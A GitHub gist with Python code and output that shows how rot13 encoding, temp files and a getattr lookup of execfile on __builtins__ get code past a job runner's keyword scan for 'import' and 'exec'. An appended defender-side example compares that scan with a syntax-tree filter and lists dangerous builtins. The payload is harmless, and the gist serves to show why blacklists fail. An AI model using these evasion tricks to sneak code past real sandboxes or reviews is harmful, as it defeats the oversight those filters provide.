Last active: August 29, 2015 14:05
Gist: kbourgoin/8bb47358c98806f05548
```python
# First, let's make some (slightly) malicious code I want to run.
# The import proves we could delete the entire disk, but really we have
# access to the whole machine if we can import anything we want.
code = """import shutil
print "\tI could have just done bad things"
"""

# Obviously you're scanning for "import", so let's obfuscate a little bit.
# I use a rot13 cipher because it's easy, but any two-way cipher
# is sufficient to hide what we're really doing.
code = code.replace('\n', ';').encode('rot13')

# Now, all I need to do is submit this as my "job code" to be run
job_code = 'exec("""{}""".encode("rot13"))'.format(code)

print "I'm going to run some code, how bad could this be?"
print 'Running: "{}"'.format(job_code)
print 'Result:'
exec(job_code)

# You could be stripping exec and eval too, so let's see if we can get around that.
exec_str = 'execfile'.encode('rot13')
wrapper = """import tempfile
fun = tempfile.NamedTemporaryFile()
fun.write('{}'.encode('rot13'))
fun.flush()
print '\tI just wrote some code to {{}}'.format(fun.name)
fn = getattr(locals()['__builtins__'], '{}'.encode('rot13'))
fn(fun.name)
""".replace('\n', ';').format(code, exec_str)

print "This code doesn't eval or exec. Has to be good, right?"
print 'Running: "{}"'.format(wrapper)
print 'Result: '
exec(wrapper)
```
Output:

```text
I'm going to run some code, how bad could this be?
Running: "exec("""vzcbeg fuhgvy;cevag " V pbhyq unir whfg qbar onq guvatf";""".encode("rot13"))"
Result:
	I could have just done bad things
This code doesn't eval or exec. Has to be good, right?
Running: "import tempfile;fun = tempfile.NamedTemporaryFile();fun.write('vzcbeg fuhgvy;cevag " V pbhyq unir whfg qbar onq guvatf";'.encode('rot13'));fun.flush();print ' I just wrote some code to {}'.format(fun.name);fn = getattr(locals()['__builtins__'], 'rkrpsvyr'.encode('rot13'));fn(fun.name);"
Result:
	I just wrote some code to /tmp/tmpkCQChX
	I could have just done bad things
```
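An added, defender-side example (not part of the gist): the substring scan the gist assumes, beside a check on the parsed syntax tree, both run over constructed strings that restate the gist's two tricks in Python 3 syntax; nothing is executed. The names `DANGEROUS_NAMES`, `review`, `SAMPLES` and the `job` placeholder are this example's own assumptions.

```python
import ast
import codecs

# Words the gist's hypothetical job runner scans for (substring match on the source).
BANNED_WORDS = ("import", "exec", "eval")
# Builtins that hand a string back to the interpreter or reach into other namespaces.
DANGEROUS_NAMES = {"exec", "eval", "compile", "__import__", "getattr", "setattr",
                   "locals", "globals", "vars", "open"}

def keyword_filter(src, banned=BANNED_WORDS):
    """The check the gist bypasses: accept unless a banned substring appears."""
    return not any(word in src for word in banned)

def ast_filter(src):
    """Inspect structure, not text: reject import statements, dangerous builtin
    names, dunder names/attributes, and anything that fails to parse (fail closed).
    Still a blacklist: it raises the bar but does not replace process isolation."""
    try:
        tree = ast.parse(src)
    except SyntaxError:
        return False
    for node in ast.walk(tree):
        if isinstance(node, (ast.Import, ast.ImportFrom)):
            return False
        if isinstance(node, ast.Name) and (node.id in DANGEROUS_NAMES or node.id.startswith("__")):
            return False
        if isinstance(node, ast.Attribute) and node.attr.startswith("__"):
            return False
    return True

def review(src):
    # Run all three checks on one submission; True means it would be accepted.
    return {"scan_import": keyword_filter(src, ("import",)),
            "scan_import_exec_eval": keyword_filter(src),
            "ast": ast_filter(src)}

# Constructed submissions (Python 3 syntax), only inspected, never run; they assume the runner exposes `codecs` and `job`.
ROT = codecs.encode("import shutil", "rot13")  # "vzcbeg fuhgvy", as in the gist
SAMPLES = {
    "plain": "import shutil\nprint('I could have just done bad things')",
    # gist trick 1: rot13 text handed to exec, which hides only the word "import"
    "rot13_exec": f'exec(codecs.decode("{ROT}", "rot13"))',
    # gist trick 2: look the builtin up by an encoded name ("rkrp" is rot13 of "exec")
    "getattr_builtins": "getattr(locals()['__builtins__'], codecs.decode('rkrp', 'rot13'))(job)",
    "benign": "total = sum(range(10))\nresult = total * 2",
}

if __name__ == "__main__":
    for name, src in SAMPLES.items():
        print(f"{name:18s} {review(src)}")
```

The syntax-tree check catches both tricks here only because it flags `exec` and `getattr` by name; treating either kind of filter as the security boundary is the mistake the gist is pointing at.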